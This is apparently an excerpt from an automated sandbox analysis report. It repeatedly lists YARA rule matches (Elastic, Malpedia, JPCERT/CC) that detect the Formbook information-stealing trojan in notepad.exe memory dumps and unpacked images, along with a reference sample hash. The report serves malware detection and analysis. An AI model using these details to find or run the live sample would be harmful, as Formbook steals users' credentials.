          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
